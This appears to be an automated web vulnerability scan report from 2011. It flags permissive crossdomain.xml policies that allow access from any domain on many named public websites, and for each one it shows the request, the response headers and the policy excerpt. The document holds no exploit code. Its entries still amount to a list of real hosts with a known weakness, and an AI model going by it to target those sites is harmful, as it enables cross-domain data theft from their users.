HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:46:14 GMT Server: Apache/2.2.14 (Fedora) Last-Modified: Wed, 26 Jan 2011 14:52:42 GMT ETag: "d746c4-ef-49ac0fc2c4280" Accept-Ranges: bytes Content-Length: 239 Connection: close Content-Type: text/xml <?xml version="1.0" ?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*"/> <allow-http-request ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mapquest.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mapquest.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/ Set-Cookie: tsession="oMxvAHE6AV Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Sat, 02-Apr-2011 12:52:31 GMT; Path=/ Set-Cookie: psession="XYhsFEjJgX Set-Cookie: c_Id=MjMzOjM5Mw%3D%3D; Expires=Sat, 02-Apr-2011 13:07:31 GMT; Path=/ Accept-Ranges: bytes ETag: W/"209-1301684392000" Last-Modified: Fri, 01 Apr 2011 18:59:52 GMT Content-Type: application/xml Content-Length: 209 Date: Sat, 02 Apr 2011 12:37:31 GMT Connection: keep-alive <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.marthastewart |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.marthastewart.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 04 Mar 2009 21:36:48 GMT ETag: "fcbe29-c0-d951fc00" Accept-Ranges: bytes Content-Length: 192 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:34:19 GMT Connection: close <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mate1.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mate1.net |
HTTP/1.0 200 OK Date: Sat, 02 Apr 2011 13:56:37 GMT Server: Apache Set-Cookie: DATESESS=fbd31cc9c09d8951 P3P: policyref="http://www Cache-Control: max-age=0, private Expires: Sat, 02 Apr 2011 13:56:37 GMT Content-Length: 267 Content-Type: application/xml X-Cache: MISS from crtv4.mate1.com Via: 1.1 crtv4.mate1.com:80 (squid/2.7.STABLE7) Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" to-ports="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.menshealth.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.menshealth.com |
HTTP/1.0 200 OK Server: IBM_HTTP_Server Last-Modified: Thu, 03 Jan 2008 12:17:58 GMT ETag: "c9-62610980" Content-Type: text/xml Date: Sat, 02 Apr 2011 13:36:12 GMT Content-Length: 201 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.metacafe.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.metacafe.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT ETag: "17f18a6-d0-49d966e98b740 Accept-Ranges: bytes Content-Length: 208 Content-Type: application/xml Cache-Control: max-age=86400 Date: Sat, 02 Apr 2011 13:23:04 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.metrolyrics |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.metrolyrics.com |
HTTP/1.0 200 OK Accept-Ranges: bytes ETag: "c4-4c72c0fe-0" Last-Modified: Mon, 23 Aug 2010 18:42:06 GMT Content-Type: application/xml Content-Length: 196 Date: Sat, 02 Apr 2011 13:25:39 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia |
Severity: | High |
Confidence: | Certain |
Host: | http://www.minorleag |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.minorleaguebaseball |
HTTP/1.0 200 OK Server: Oracle-iPlanet-Web-Server Date: Sat, 02 Apr 2011 13:37:49 GMT Content-Type: text/xml Content-Length: 80 Cache-Control: max-age=60 Edge-control: max-age=60 Last-Modified: Mon, 16 May 2005 18:12:09 GMT ETag: "50-4288e279" Accept-Ranges: bytes Age: 47 X-Cache: HIT from cache.mlb.com Via: 1.1 cache.mlb.com:8888 (squid/2.7.STABLE6) Connection: keep-alive <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mlb.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mlb.com |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Tue, 18 Jan 2011 20:14:01 GMT Content-Length: 428 Accept-Ranges: bytes Server: Oracle-iPlanet-Web-Server Date: Sat, 02 Apr 2011 13:24:42 GMT Cache-Control: max-age=60 Edge-control: max-age=60 ETag: "1ac-4d35f489" Age: 25 X-Cache: HIT from cache.mlb.com Via: 1.1 cache.mlb.com:8888 (squid/2.7.STABLE6) Connection: keep-alive <cross-domain-policy> <allow-access-from domain="*"/> <allow-access-from domain="*.mlb.com" secure="false" /> <allow-http-request <site ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mmo-champion |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mmo-champion.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 23 Nov 2010 22:26:07 GMT Content-Length: 332 Date: Sat, 02 Apr 2011 13:46:14 GMT Connection: close X-Cache-Hits: -1 X-URL: /crossdomain.xml X-Backend: phpservers2 X-Req: 455438597 X-Language: en <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mtv.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mtv.com |
HTTP/1.0 200 OK Server: Apache/2.0.63 (Unix) mod_jk/1.2.27 Last-Modified: Tue, 15 Apr 2008 20:18:17 GMT ETag: "4b5484c-117-44aef19 Accept-Ranges: bytes Content-Length: 279 Content-Type: application/xml Cache-Control: max-age=600 Date: Sat, 02 Apr 2011 12:43:43 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <al ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.myrecipes.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.myrecipes.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:43:13 GMT Server: Apache Last-Modified: Tue, 05 Oct 2010 18:26:00 GMT ETag: "b13f7-d9-491e2caecde00" Accept-Ranges: bytes Content-Length: 217 Content-Type: application/xml Vary: X-Catmap-Header P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi O TRo IND DSP CAO COR' Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> </cros ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ncm.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ncm.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 25 Mar 2011 13:00:36 GMT Accept-Ranges: bytes ETag: "072eca1eceacb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:35:56 GMT Connection: close Content-Length: 897 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="tst.ncmsocial.com"/> <allow-access-from domain="localhost.ncmsocial.com"/> <allow-access-from domain="dev.ncmsocial.com"/> <allow-access-from domain="ncmsocial.com"/> <allow-access-from domain="www.ncmsocial.com"/> <allow-access-from domain="www.totaleclips.com"/> <allow-access-from domain="totaleclips.com"/> <allow-access-from domain="edgesuite.net"/> <allow-access-from domain="progressive.totaleclips <allow-access-from domain="www.fathomevents.com"/> <allow-access-from domain="www.movienightout.com"/> ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.newser.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.newser.com |
HTTP/1.1 200 OK Content-Type: text/xml Expires: Sun, 29 Mar 2020 00:00:00 GMT Last-Modified: Sun, 01 Feb 2009 20:47:39 GMT Accept-Ranges: bytes Date: Sat, 02 Apr 2011 14:03:49 GMT Connection: close Content-Length: 324 ...<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.newsok.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.newsok.com |
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Last-Modified: Tue, 29 Jun 2010 19:32:53 GMT ETag: "1bd06e-106-48a304daba340 Accept-Ranges: bytes Content-Type: text/xml Connection: close Date: Sat, 02 Apr 2011 12:52:35 GMT Age: 556 Content-Length: 262 <?xml version="1.0"?> <!-- http://static.newsok.biz <cross-domain-policy> <allow-access-from domain="newsok..com" /> <allow-access-from domain="*.newsok..com" /> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.nickjr.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.nickjr.com |
HTTP/1.0 200 OK Server: Apache/2.0.63 (Unix) mod_jk/1.2.27 Content-Length: 864 Content-Type: text/xml Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:20 GMT; path=/ ETag: W/"864-1301149306000" Vary: User-Agent Cache-Control: max-age=1200 Date: Sat, 02 Apr 2011 13:31:20 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*"/> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.nickjr.com" /> <allow-access-from domain="*.nickjr-d.mtvi.com" /> <allow-access-from domain="*.nickjr-q.mtvi.com" /> <allow-access-from domain="*.nick.com" /> <allow-access-from domain="*.nick-d.mtvi.com" /> <allow-access-from domain="*.nick-q.mtvi.com" /> <allow-access-from domain="*.mtvi.com" /> <allow-access-from domain="*.dimetapp.com" /> <allow-access-from domain="*.mtvnservices.com"/> <allow-access-from domain="*.tween.as" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.nola.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.nola.com |
HTTP/1.0 200 OK Server: Apache Content-Length: 324 Content-Type: text/xml ETag: "71686e-144-47185a180bb40 P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM' ntCoent-Length: 324 Cache-Control: max-age=1 Expires: Sat, 02 Apr 2011 13:37:08 GMT Date: Sat, 02 Apr 2011 13:37:07 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.nydailynews |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.nydailynews.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:23:38 GMT Server: Apache Last-Modified: Fri, 14 Sep 2007 15:01:08 GMT Accept-Ranges: bytes Content-Length: 200 Keep-Alive: timeout=3, max=999 Content-Type: application/xml Content-Language: en Age: 0 Via: AX-CACHE-2.4:20 Set-Cookie: sto-id-sg-web-8080 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.oodle.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.oodle.com |
HTTP/1.0 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Last-Modified: Wed, 12 Mar 2008 00:55:41 GMT ETag: "11c80ff-ca-44832e564dd40 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:36:37 GMT Content-Length: 202 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.openforum.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.openforum.com |
HTTP/1.0 200 OK Content-Length: 390 Content-Type: text/xml Last-Modified: Tue, 22 Mar 2011 14:34:04 GMT Accept-Ranges: bytes ETag: "1CBE89E31501600" Server: Microsoft-IIS/6.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: public, max-age=65014 Expires: Sun, 03 Apr 2011 07:43:08 GMT Date: Sat, 02 Apr 2011 13:39:34 GMT Connection: close <?xml version="1.0" encoding="UTF-8" ?> <cross-domain-policy xmlns:xsi="http://www.w3 ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.opportunity.co |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.opportunity.co |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:55:35 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Wed, 02 Feb 2011 03:06:57 GMT ETag: "48c0006-c3-f11a7640" Accept-Ranges: bytes Content-Length: 195 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia |
Severity: | High |
Confidence: | Certain |
Host: | http://www.outdoorchannel |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.outdoorchannel.com |
HTTP/1.1 200 OK Cache-Control: public Content-Type: text/xml Last-Modified: Fri, 27 Aug 2010 15:20:56 GMT Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 14:07:28 GMT Set-Cookie: ecm=user_id=0&isMemb Set-Cookie: EktGUID=8b192145-0a99 Set-Cookie: EkAnalytics=newuser; expires=Mon, 02-Apr-2012 14:07:28 GMT; path=/ Content-Length: 208 Connection: close Via: 1.1 AN-0016020121270012 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.pcworld.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.pcworld.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"194-1297458026000" Last-Modified: Fri, 11 Feb 2011 21:00:26 GMT Content-Type: application/xml Content-Length: 194 Date: Sat, 02 Apr 2011 14:10:44 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia |
Severity: | High |
Confidence: | Certain |
Host: | http://www.people.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.people.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:43:25 GMT Server: Apache Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT ETag: "373-cdb58f40" Accept-Ranges: bytes Content-Length: 883 Content-Type: application/xml Vary: Accept-Encoding,X-Catmap P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR' Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> <allow-access-from domain="img2.timeinc.net"/> <allow-access-from domain="img2-short.timeinc.net"/> <allow-access-from domain="*.aol.com"/> <allow-access-from domain="*.digitalcity.com"/> <allow-access-from domain="*.aolcdn.com"/> <allow-access-from domain="*.channel.aol.com"/> <allow-access-from domain="*.aimtoday.com"/> <allow-access-from domain="*.aimtoday.aim.com"/> <allow-access-from domain="*.dashboard.aim.com"/> <allow-access-from domain="*.aim.com"/> <allow-access-from domain="peopleconnection.aol.com"/> <allow-access-from domain="*.peoplecmg.com"/> <allow-access-from domain="*.myspacecdn.com"/> <allow-access-from domain="*.taaz.com" secure="true"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.peoplesty |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.peoplestylewatch.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:56:32 GMT Server: Apache Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT ETag: "373-cdb58f40" Accept-Ranges: bytes Content-Length: 883 Content-Type: application/xml Vary: Accept-Encoding,X-Catmap P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR' Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> <allow-access-from domain="img2.timeinc.net"/> <allow-access-from domain="img2-short.timeinc.net"/> <allow-access-from domain="*.aol.com"/> <allow-access-from domain="*.digitalcity.com"/> <allow-access-from domain="*.aolcdn.com"/> <allow-access-from domain="*.channel.aol.com"/> <allow-access-from domain="*.aimtoday.com"/> <allow-access-from domain="*.aimtoday.aim.com"/> <allow-access-from domain="*.dashboard.aim.com"/> <allow-access-from domain="*.aim.com"/> <allow-access-from domain="peopleconnection.aol.com"/> <allow-access-from domain="*.peoplecmg.com"/> <allow-access-from domain="*.myspacecdn.com"/> <allow-access-from domain="*.taaz.com" secure="true"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.pittsburghlive |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.pittsburghlive.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:10:01 GMT Server: Apache/2.2.3 (Red Hat) PHP/5.1.6 Last-Modified: Mon, 24 Jan 2011 21:35:59 GMT Accept-Ranges: bytes Content-Length: 455 Vary: Accept-Encoding,User Connection: close Content-Type: text/xml <cross-domain-policy xmlns:xsi="http://www.w3 <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> <allow-access-from domain="*.brightcove.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.abacast.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.pittsburghlive.com"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.playfin.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.playfin.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:06:52 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Thu, 17 Feb 2011 23:46:03 GMT ETag: "1cf1115-c6-49c83001704c0 Accept-Ranges: bytes Content-Length: 198 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.pokerstars.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.pokerstars.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:56:55 GMT Server: Apache Last-Modified: Tue, 25 Jan 2011 19:43:06 GMT ETag: "5af-ece20680" Accept-Ranges: bytes Content-Length: 1455 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.pokerstarsblog.com"/> <allow-access-from domain="*.pokerstars.com"/> <allow-access-from domain="*.pokerstars.pl"/> <allow-access-from domain="*.pokerstars.es"/> <allow-access-from domain="*.pokerstars.fi"/> <allow-access-from domain="*.pokerstars.hu"/> <allow-access-from domain="*.pokerstars.nl"/> <allow-access-from domain="*.pokerstars.se"/> <allow-access-from domain="*.pokerstars.co.uk"/> <allow-access-from domain="*.pokerstars.it"/> <allow-access-from domain="*.pokerstars.si"/> <allow-access-from domain="*.pokerstars.pt"/> <allow-access-from domain="*.pokerstars.cz"/> <allow-access-from domain="*.appt.com"/> <allow-access-from domain="*.europeanpokertour.com"/> <allow-access-from domain="*.wcoop.com"/> <allow-access-from domain="*.pokerstars.tv"/> <allow-access-from domain="*.joehachem.com"/> <allow-access-from domain="*.chrismoneymaker.com"/> <allow-access-from domain="*.greg-raymer.net"/> <allow-access-from domain="*.andre-akkari.com"/> <allow-access-from domain="*.danielnegreanu.ca"/> <allow-access-from domain="*.hevad-khan.com"/> <allow-access-from domain="*.lee-nelson.net"/> <allow-access-from domain="*.vanessa-rousso.net"/> <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.popularsc |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.popularscreensavers |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:34:45 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28 ETag: W/"241-1301508774000" Last-Modified: Wed, 30 Mar 2011 18:12:54 GMT Content-Length: 241 Connection: close Content-Type: application/xml <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-http-request <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.rawtube.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.rawtube.com |
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Last-Modified: Wed, 13 May 2009 01:35:39 GMT ETag: "820f-13b-469c13a9090c0" Content-Type: text/xml Content-Length: 315 Via: www.rawtube.com Date: Sat, 02 Apr 2011 12:32:31 GMT X-Varnish: 863747465 862901038 Age: 3296 Via: 1.1 varnish Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.realsimple.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.realsimple.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:44:09 GMT Server: Apache Last-Modified: Tue, 06 Oct 2009 18:54:33 GMT ETag: "2158b86-16c-47548c2 Accept-Ranges: bytes Content-Length: 364 Content-Type: application/xml Vary: X-Catmap-Header P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR' Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> <allow-access-from domain="*.redcated" /> <allow-access-from domain="*.atlassolutions.com" /> <allow-access-from domain="*.akamai.net" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.redorbit.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.redorbit.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:34:39 GMT Server: Apache Last-Modified: Tue, 01 Mar 2011 15:00:52 GMT Accept-Ranges: bytes Content-Length: 208 Vary: User-Agent Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.scout.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.scout.com |
HTTP/1.1 200 OK Content-Length: 222 Content-Type: text/xml Content-Location: http://www.scout.com Last-Modified: Thu, 19 Aug 2010 20:24:22 GMT Accept-Ranges: bytes ETag: "01f3482dc3fcb1:110f" Server: Microsoft-IIS/6.0 Server: Static2 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:44:51 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.sendspace.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.sendspace.com |
HTTP/1.0 200 OK Content-Type: text/xml ETag: "1797000725" Last-Modified: Fri, 01 Apr 2011 07:15:01 GMT Content-Length: 115 Connection: close Date: Sat, 02 Apr 2011 14:08:28 GMT Server: Apache <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" secure="false" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.sfgate.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.sfgate.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:43:16 GMT Server: Apache/2.2.16 (Linux/SUSE) DAV/2 mod_fcgid/2.3.5 mod_perl/2.0.4 Perl/v5.12.1 Set-Cookie: Apache=173.193.214.243 Last-Modified: Tue, 09 Jan 2007 23:06:08 GMT ETag: "4d737b-cb-426a397623678" Accept-Ranges: bytes Content-Length: 203 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.sheknows.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.sheknows.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:53:25 GMT Server: Apache/2 Accept-Ranges: bytes Content-Length: 201 Vary: Accept-Encoding X-Served-By: app3v-sk.wuo.lax2 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.shockwave.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.shockwave.com |
HTTP/1.0 200 OK Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2 Last-Modified: Wed, 25 Feb 2009 04:02:39 GMT ETag: "11d7972a2-109-463b6 Accept-Ranges: bytes Content-Length: 265 Content-Type: application/xml Cache-Control: max-age=624 Expires: Sat, 02 Apr 2011 13:55:06 GMT Date: Sat, 02 Apr 2011 13:44:42 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> <allow-access-from domain="*.nick.com" secure="true" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.slideshare.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.slideshare.net |
HTTP/1.1 200 OK Server: nginx/0.6.39 Content-Type: text/xml Last-Modified: Fri, 01 Apr 2011 18:28:13 GMT Expires: Sun, 03 Apr 2011 12:32:11 GMT Cache-Control: max-age=86400 Content-Length: 222 Date: Sat, 02 Apr 2011 13:37:27 GMT X-Varnish: 2056362629 2055719298 Age: 3916 Via: 1.1 varnish Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" to-ports="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.spike.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.spike.com |
